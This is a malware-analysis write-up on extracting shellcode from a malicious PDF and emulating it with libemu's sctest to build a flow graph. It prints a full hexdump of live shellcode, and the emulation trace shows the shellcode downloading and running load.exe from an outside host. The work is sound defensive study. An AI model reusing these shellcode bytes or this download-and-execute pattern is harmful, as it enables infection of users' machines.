libemu and extracting shellcodes from pdf malware
DESCRIPTION
Libemu and extracting shellcodes from PDF malware, GraphvizTRANSCRIPT
Using libemu to create malware flow graph
Muhammad Najmi Ahmad [email protected]∗
Abstract
In this paper basically I just document my personal experience, thatis the process of extracting shellcodes from PDF malware and later put itinto Graphviz’s picture. I adapt most the examples are from the tutorialgiven by [Jeremy, 2008].
1 Introduction
In this write up I will show to you on how to extract shellcodes from PDF files.
2 PDF malware
Malicious PDF contains embedded Javascript (*.js). This Javascript may doesharmful activity without the user’s consent.
3 Steps to extract shellcodes
3.1 Tools of trade
What we need to do basically use the existing tool. As of now I suggest you todownload the following tools:
• http://code.google.com/p/pyew/
• http://libemu.carnivore.it/
• http://www.graphviz.org/
3.2 Extracting the shellcode
I used pdf example.py from the pyew package.� �$ ls pdf_example.py -l
-rwxr -xr-x 1 najmi najmi 1497 2010 -03 -30 20:03 pdf_example.py� �Given that I have a PDF malware fetched from the wild:
∗Thanks to my wife, for providing hot coffee!
1
� �$ avgscan bc66fd9e0c2f7a79167dab16531c28f2
AVG command line Anti -Virus scanner
Copyright (c) 2009 AVG Technologies CZ
Virus database version: 271.1.1/2834
Virus database release date: Sun , 25 Apr 2010 14:31:00 +08:00
bc66fd9e0c2f7a79167dab16531c28f2 Virus found Script/Exploit
Files scanned : 1(1)
Infections found : 1(1)
PUPs found : 0
Files healed : 0
Warnings reported : 0
Errors reported : 0� �By using the said tool in Section 3.1 above, I manually took the intended
garbled shellcodes, which contains the following shellcodes:
Figure 1: PDF shellcodes in Pyew tool
Now let us see the strings. Take out the following strings in between theunescape() brakets, and save it somewhere in a texeditor.
2
Figure 2: PDF shellcodes (Zoom mode)
Now, we need to filter out the unintended strings, simply cut out using thefollowing perl script:
cat shell.txt | perl -pe ’s/\%u(..)(..)/ chr(hex($2)).chr(hex($1))/ge ’ > filtered -shell.txt
Now, you should get the intended shellcodes. You actually can see a plainURL within that PDF shellcodes. Say, by using hexdump tool:
$hexdump -C filtered -shell.txt
00000000 90 90 90 90 90 90 eb 0f 5b 33 c9 66 b9 80 01 80 |........[3.f....|
00000010 33 11 43 e2 fa eb 05 e8 ec ff ff ff 81 75 b0 21 |3.C..........u.!|
00000020 11 11 11 9a 51 1d 9a 61 0d bc 9a 61 19 90 fd 11 |....Q..a...a....|
00000030 15 11 11 9a fd 47 79 9f 5f 1f fd f9 ef 11 11 11 |..... Gy._.......|
00000040 98 54 15 47 79 89 ef 9b 1f f9 e1 11 11 11 98 54 |.T.Gy ..........T|
00000050 19 47 79 34 a1 ee d3 f9 f3 11 11 11 98 54 1d 47 |.Gy4 .........T.G|
00000060 79 fe df f1 71 f9 c5 11 11 11 98 54 01 47 79 d0 |y...q......T.Gy.|
00000070 68 f4 a9 f9 d7 11 11 11 98 54 05 51 91 29 d2 64 |h........T.Q.).d|
00000080 eb 98 54 09 f8 16 10 11 11 4f 98 64 35 9a 54 15 |..T......O.d5.T.|
00000090 7b 10 48 9a 44 09 47 f9 9a 11 11 11 41 79 27 0b |{.H.D.G.....Ay ’.|
000000 a0 3e 61 f9 86 11 11 11 98 54 0d 9a d4 92 d1 41 98 |>a......T.....A.|
000000 b0 54 31 79 ee 11 11 11 41 9a 54 05 7b 13 48 9a 44 |T1y ....A.T.{.H.D|
000000 c0 09 f9 70 11 11 11 12 54 31 d6 11 4d 6f 3f 74 d6 |..p....T1..Mo?t.|
000000 d0 51 15 69 74 11 11 ee 64 31 9a 54 1d 7b 10 48 9a |Q.it...d1.T.{.H.|
000000 e0 44 09 f9 51 11 11 11 7b 16 49 12 54 35 22 ca 42 |D..Q...{.I.T5".B|
000000 f0 42 ee 64 31 41 42 9a 54 0d 7b 14 48 9a 44 09 f9 |B.d1AB.T.{.H.D..|
00000100 32 11 11 11 7b 11 ee 64 31 9a 54 19 7b 13 48 9a |2...{.. d1.T.{.H.|
00000110 44 09 f9 01 11 11 11 7b ee 9a 54 01 7b 10 48 9a |D......{..T.{.H.|
00000120 44 09 f9 11 11 11 11 50 4a 43 12 f0 12 f0 12 f0 |D...... PJC ......|
00000130 12 f0 92 fd 15 4b 42 9a cb f3 e6 43 ee f1 44 9a |..... KB....C..D.|
00000140 fd 9a 6c 19 9a 4c 1d 47 9a 62 2d 9a 65 0f 69 12 |..l..L.G.b-.e.i.|
00000150 e2 47 9a 67 31 12 e2 22 d8 58 50 bc 12 d2 47 22 |.G.g1..".XP...G"|
00000160 e7 1e af 01 2b e3 65 19 d0 df 1c 12 e3 51 fa e0 |....+.e......Q..|
00000170 2a ef 4f 64 f4 4b 9a fa 9a 4b 35 12 cc 77 9a 1d |*.Od.K...K5..w..|
00000180 5a 9a 4b 0d 12 cc 9a 15 9a 12 d4 4f 4c d3 19 11 |Z.K........ OL...|
00000190 f9 e5 ef ee ee 44 43 5d 5c 5e 5f 11 68 74 74 70 |..... DC]\^_.http|
000001 a0 3a 2f 2f 62 75 74 65 72 69 6b 2e 63 6f 6d 2f 31 |:// buterik.com /1|
000001 b0 32 33 2f 6c 6f 61 64 2e 65 78 65 00 0a |23/ load.exe ..|
3
Now, we need to call the libemu’s tool called sctest. By using the followingcommand:� �sctest -Sgs 1000000 -v < filtered -shell -.txt� �
It will creates the following output:� �verbose = 1
success offset = 0x00000017
Hook me Captain Cook!
userhooks.c:132 user_hook_ExitThread
ExitThread (-1)
stepcount 314316
HMODULE LoadLibraryA (
LPCTSTR lpFileName = 0x00417195 =>
= "URLMON ";
) = 0x7df20000;
UINT GetSystemDirectory (
LPTSTR lpBuffer = 0x0012fae8 =>
= "c:\ WINDOWS\system32 ";
UINT uSize = 255;
) = 19;
ERROR DeleteFile (
LPCTSTR lpFileName = 0x0012fae8 =>
none;
) = -1;
HRESULT URLDownloadToFile (
LPUNKNOWN pCaller = 0x00000000 =>
none;
LPCTSTR szURL = 0x0041719c =>
= "http :// buterik.com /123/ load.exe";
LPCTSTR szFileName = 0x0012fae8 =>
= "c:\ WINDOWS\system32 \~.exe";
DWORD dwReserved = 0;
LPBINDSTATUSCALLBACK lpfnCB = 0;
) = 0;
UINT WINAPI WinExec (
LPCSTR lpCmdLine = 0x0012fae8 =>
= "c:\ WINDOWS\system32 \~.exe";
UINT uCmdShow = 0;
) = 32;
void ExitThread (
DWORD dwExitCode = -1;
) = 0;� �Now, if you want to create a flow graph, we need to add an extra flag, -G
flag to the tool’s execution.
sctest -Sgs 1000000 -v -G shell.dot < filtered -shell -bc66fd9e0c2f7a79167dab16531c28f2.txt
Next, execute the dot command (from Graphviz package):� �dot shell.dot -Tpng -o shell.png� �
This will create a PNG file which contains the following graph:
4
5
6
References
[Jeremy, 2008] Jeremy (2008). http://www.sudosecure.net/archives/313.
7